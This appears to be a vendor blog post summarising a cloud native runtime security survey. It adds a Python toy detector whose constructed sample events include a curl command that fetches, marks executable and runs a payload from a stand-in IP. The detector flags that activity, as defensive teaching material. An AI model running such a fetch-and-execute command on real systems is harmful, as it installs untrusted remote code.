As container environments grow in size and complexity, many misconceptions persist about securing cloud native applications. Our latest survey reveals a wide knowledge gap around runtime security: 97% of cloud native security practitioners are still unaware of a basic container security principle, namely that a container is not in itself a security boundary. Here are the insights we gained into the challenges that DevOps and security teams face daily.
Survey highlights
The default security of containers is overestimated
The term "container" is often misunderstood. The notion of isolation gives many practitioners a false sense of security, as if the technology were inherently safe. In reality, a container is a set of processes sharing the host kernel; namespaces and cgroups limit what those processes can see and consume, but they are not a hardened security boundary. A kernel vulnerability, a privileged container, or a mounted host path can turn a compromised container into a compromised node. Our container runtime security survey found that only 3% of respondents understand that a container, in and of itself, is not a security boundary.
‘Shift left’ isn’t a silver bullet for cloud native security
Static analysis plays an important role in container security, but it inspects an image at build time. A vulnerability disclosed after the scan, a misconfiguration applied at deploy time, or an administrator error in production is invisible to even the most complete shift-left pipeline. Container runtime security is critical for catching adversaries who evade static analysis or otherwise get around the more popular, and better understood, shift-left controls.
Key cloud native security concepts are largely misunderstood
The overwhelming majority of respondents (85%) believe that traditional tools such as intrusion prevention systems (IPS), endpoint detection and response (EDR), and firewalls could stop an attack in progress in a cloud native environment (an attack that occurs after an image has been deployed). In fact, these tools were built around long-lived hosts and perimeter traffic. They typically lack container context (which pod, image, and namespace a process or packet belongs to), struggle with workloads that live for minutes, and do not see east-west traffic between pods that never crosses a perimeter firewall, so their coverage in dynamically orchestrated environments is limited.
Practitioners are overconfident in their protection
The survey shows that teams need a better grasp of the fundamental components of runtime security, such as enforcing the immutability of containers (a running container should execute only what shipped in its image). Only 32% of respondents were confident in their ability to stop runtime attacks, and even fewer take the steps needed to achieve runtime protection:
- Only 14% were confident in enforcing image immutability in production
- Only 21% were confident in mitigating exploits at runtime
- Only 23% were confident in managing secrets at runtime
Without these runtime capabilities, teams cannot reliably detect threats in a cloud native environment, let alone respond to them.
[Figure: Confidence in cloud native security capabilities]
Organizations are ill-equipped to detect and remedy runtime attacks
When it comes to runtime protection, organizations still have significant gaps in their security coverage. Just 26% of respondents said their organization could stop an attack in progress, which points to a general lack of runtime capabilities in the toolkits of the other 74%.
The urgency for runtime security controls
As the threat landscape rapidly evolves, strong runtime security is more essential than ever. We have seen many examples of adversaries using legitimate, vanilla images that pass scanning clean and fetch their malicious payload only after the container starts, so there is nothing in the image for a scanner to find. Shifting left with image scanning and malware detection at build time is not enough to stop attacks that evade static analysis by design.
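The following is an added example, not code from the original survey post or from any product it describes. It models the scenario above, and the immutability point from the previous section, as two runtime detection rules evaluated over a constructed stream of in-container process executions: "drift" fires when a container executes a binary that did not ship in its image, and "download_then_exec" fires when a file fetched by curl or wget at runtime is later executed in the same container. The container names, image file lists, IP address, and event timeline are all made up for illustration; note that the sample image contains nothing a scanner would object to.

```python
# Added example (not from the original survey post): a toy runtime detector
# that flags behaviour image scanning cannot see. All inputs below are
# constructed for illustration, not real telemetry.
import os
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class ExecEvent:
    """One process execution observed inside a running container."""
    ts: float          # seconds since container start
    container: str     # container id / name
    pid: int
    exe: str           # resolved path of the executed binary
    args: Tuple[str, ...]


@dataclass(frozen=True)
class Alert:
    ts: float
    container: str
    rule: str
    detail: str


# Binaries that fetch content from the network; matched on basename so that
# /usr/bin/curl and /bin/curl are treated alike.
DOWNLOADERS = {"curl", "wget"}


def download_target(ev: ExecEvent) -> Optional[str]:
    """Return the output path of a curl -o / wget -O invocation, if any."""
    if os.path.basename(ev.exe) not in DOWNLOADERS:
        return None
    for i, arg in enumerate(ev.args):
        if arg in ("-o", "-O") and i + 1 < len(ev.args):
            return ev.args[i + 1]
    return None


def detect(events: List[ExecEvent], image_files: Dict[str, Set[str]]) -> List[Alert]:
    """Evaluate two runtime rules in event order.

    image_files maps a container to the set of executables that shipped in
    its image, i.e. everything a build-time scanner had a chance to inspect.

    drift:               a binary not present in the image is executed, so the
                         container is no longer immutable.
    download_then_exec:  a file fetched by curl/wget at runtime is later
                         executed in the same container.
    """
    alerts: List[Alert] = []
    fetched: Dict[str, Set[str]] = {}  # container -> paths written by a downloader
    for ev in sorted(events, key=lambda e: e.ts):
        shipped = image_files.get(ev.container)
        if shipped is not None and ev.exe not in shipped:
            alerts.append(Alert(ev.ts, ev.container, "drift",
                                f"executed {ev.exe}, which is not part of the image"))
        if ev.exe in fetched.get(ev.container, set()):
            alerts.append(Alert(ev.ts, ev.container, "download_then_exec",
                                f"executed {ev.exe}, fetched from the network at runtime"))
        target = download_target(ev)
        if target is not None:
            fetched.setdefault(ev.container, set()).add(target)
    return alerts


# Constructed sample: the "web" image is clean (curl is a legitimate part of it),
# so scanning IMAGE_FILES at build time raises nothing. The "db" container only
# ever runs what it shipped with and must produce no alerts.
IMAGE_FILES: Dict[str, Set[str]] = {
    "web-7f3a": {"/usr/local/bin/python3", "/bin/sh", "/bin/chmod", "/usr/bin/curl"},
    "db-19c0": {"/usr/local/bin/postgres", "/bin/sh"},
}

SAMPLE_EVENTS: List[ExecEvent] = [
    ExecEvent(0.1, "web-7f3a", 1, "/usr/local/bin/python3", ("python3", "app.py")),
    ExecEvent(0.2, "db-19c0", 1, "/usr/local/bin/postgres", ("postgres",)),
    ExecEvent(41.0, "web-7f3a", 57, "/bin/sh",
              ("sh", "-c", "curl -fsSL http://203.0.113.9/p -o /tmp/.p && chmod +x /tmp/.p && /tmp/.p")),
    # The payload is fetched only now; it never existed in the image.
    ExecEvent(41.1, "web-7f3a", 58, "/usr/bin/curl",
              ("curl", "-fsSL", "http://203.0.113.9/p", "-o", "/tmp/.p")),
    ExecEvent(41.3, "web-7f3a", 59, "/bin/chmod", ("chmod", "+x", "/tmp/.p")),
    ExecEvent(41.4, "web-7f3a", 60, "/tmp/.p", ("/tmp/.p",)),
    ExecEvent(60.0, "db-19c0", 12, "/bin/sh", ("sh", "-c", "pg_isready")),
]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS, IMAGE_FILES):
        print(f"t={a.ts:6.1f} {a.container} [{a.rule}] {a.detail}")
```

Running the sample produces two alerts, both on the execution of /tmp/.p in the web container, and none for the database container. The enforcement counterpart of the drift rule is to make the write impossible in the first place, for example with `securityContext.readOnlyRootFilesystem: true` on a Kubernetes pod, which would have blocked curl from saving the payload to /tmp unless a writable volume was mounted there.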
Only holistic cloud native security, applied across every stage of the application life cycle, can secure a cloud native environment while preserving business continuity. This approach embeds security early in the development cycle and carries it all the way into production, protecting the build, the infrastructure, and the running workloads.
Want more insights to help understand the container runtime security challenges? Download our 2021 Cloud Native Security Survey.